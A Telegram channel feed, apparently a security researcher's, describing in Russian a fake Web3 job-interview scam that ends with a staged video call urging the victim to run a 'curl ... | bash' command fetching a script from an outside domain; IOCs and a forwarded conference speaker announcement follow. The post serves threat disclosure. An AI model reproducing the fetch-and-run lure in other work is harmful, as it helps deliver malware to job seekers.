сelestial intelligence lab
1.05K subscribers
87 photos
4 videos
3 files
52 links
building cool things with cool people🕵️‍♂️
@celestial3301
Download Telegram
Как вакансия Blockchain Analyst закончилась curl | bash

Несколько дней назад я откликнулся на вакансию Blockchain Analyst в WhatIf через LinkedIn. На первый взгляд всё выглядело нормально: полноценное описание роли, Web3/blockchain research, on-chain analytics, remote US, зарплата $85k–125k в год. Сама вакансия действительно была опубликована от страницы WhatIf в LinkedIn. LinkedIn

У компании тоже есть нормальный публичный след: страница существует не первый день, WhatIf указывает 2019 год основания, Dubai, размер 2–10 сотрудников и blockchain среди направлений работы.
Вакансия Blockchain Analyst
LinkedIn WhatIf
После отклика мне написал человек под именем Emma Martin с адреса, отображавшегося как emma.martin@whatif.capital.

Первое письмо вообще без красных флагов: когда готов выйти, могу ли работать remote, сколько хочу денег, сколько лет опыта и что из моего опыта наиболее релевантно позиции.

После этого назначили интервью через RelayArc.
RelayArc
Первый странный момент - с телефона на встречу зайти нельзя вообще. Страница прямо говорит: Desktop required.

Ладно. Открываю ссылку с Mac, попадаю в вполне прилично сделанный интерфейс видеозвонка. На другой стороне - Emma Martin.
Только довольно быстро становится понятно, что никакого нормального разговора там нет.

Видео выглядит записанным, а через несколько минут в чате начинается сценарий:
“Can you see and hear me okay?”
Потом:
“I still cannot hear you…”
И наконец предложение воспользоваться встроенным microphone troubleshooting.

Начинается непосредственно delivery.
RelayArc сообщает, что браузер якобы не смог определить микрофон и для полноценного аудио необходимо установить RelayArc for Mac.
Кнопка большая, всё выглядит как обычный troubleshooting какого-нибудь Zoom.
Нажимаем Download App - и внезапно вместо .dmg, App Store или хотя бы подписанного installer получаем инструкцию:

открыть Terminal и выполнить одну команду.
На странице была команда вида:
curl -kfsSL hxxps://download-storage[.]com/... | bash

То есть сервис предлагает скачать содержимое с другого домена и сразу передать его на выполнение в bash.

На этом «интервью» можно было заканчивать.

Получилась довольно аккуратная цепочка:
LinkedIn vacancy → recruiter → screening → scheduled interview → fake video call → искусственная проблема с микрофоном → “desktop app” → curl | bash

Месяц назад другой человек описывал очень похожую Web3 recruitment-схему: вакансия через LinkedIn, затем интервью на неизвестной meeting-платформе Werknova, а recruiter представлялся тем же именем - Emma Martin. Он тоже заметил, что взаимодействие выглядело заранее записанным.

Я пока не утверждаю, что сама WhatIf стоит за этой кампанией. Здесь ещё надо разбираться отдельно: действительно ли письмо было аутентифицировано инфраструктурой whatif.capital, был ли скомпрометирован корпоративный аккаунт/домен или использовалась другая схема.

Но сам infection flow уже достаточно очевиден.

IOC / артефакты на текущий момент:
relayarc[.]io
Persona: Emma Martin
Lure: Blockchain Analyst / Web3 recruitment
Execution: remote shell script via curl ... | bash

Но теперь уже интересно посмотреть, что именно они пытались поставить, куда ходит скрипт, что он собирает и пересекается ли инфраструктура RelayArc с другими fake-interview кампаниями

Так что продолжение, скорее всего, будет)
🔥17👍32
Загружаю все доказательства, секунду)
🤩7
Тут прикол в том, что я на всех конференциях об этом рассказываю, но у самого такое в первый раз)
❤‍🔥9
Мне надо ехать по делам, но мы обязательно с вами что-нибудь наосинтим на эту профурсетку)
❤‍🔥12
Forwarded from KazHackStan
🎤 KazHackStan 2026 спикері - Дінмұхаммед Қабиден

Дінмұхаммед - OSINT, Web3-зерттеулер және блокчейн қауіпсіздігіне маманданған киберқауіпсіздік зерттеушісі 🔐

Ол «Bridges Laundering: Cross-Chain Exploitation and the AppSec Blind Spot» тақырыбында сөз сөйлейді.

Дінмұхаммед cross-chain bridge шабуылдарын, laundering схемаларын және блокчейндер арасындағы қаражат қозғалысын зерттеу тәсілдерін көрсетеді 👀

📅 29–30 қыркүйек
📍 Астана, Тәуелсіздік сарайы
🔗 kazhackstan.com

🎤 Спикер KazHackStan 2026 - Динмухаммед Кабиден

Динмухаммед - исследователь в области кибербезопасности, специализирующийся на OSINT, Web3-расследованиях и безопасности блокчейна 🔐

Он выступит с докладом «Bridges Laundering: Cross-Chain Exploitation and the AppSec Blind Spot».

Динмухаммед расскажет о взломах cross-chain bridges, схемах laundering и анализе движения средств между блокчейнами 👀

📅 29–30 сентября
📍 Астана, Дворец Независимости
🔗 kazhackstan.com

🎤 KazHackStan 2026 Speaker - Dinmukhammed Kabiden

Dinmukhammed is a cybersecurity researcher specializing in OSINT, Web3 investigations, and blockchain security 🔐

He will present “Bridges Laundering: Cross-Chain Exploitation and the AppSec Blind Spot”.

Dinmukhammed will cover real-world cross-chain bridge hacks, laundering schemes, and how funds can be traced across blockchains 👀

📅 September 29–30
📍 Astana, Palace of Independence
🔗 kazhackstan.com
12❤‍🔥5👍3
This media is not supported in your browser
VIEW IN TELEGRAM
11🤣2🤝1
This media is not supported in your browser
VIEW IN TELEGRAM
🤣74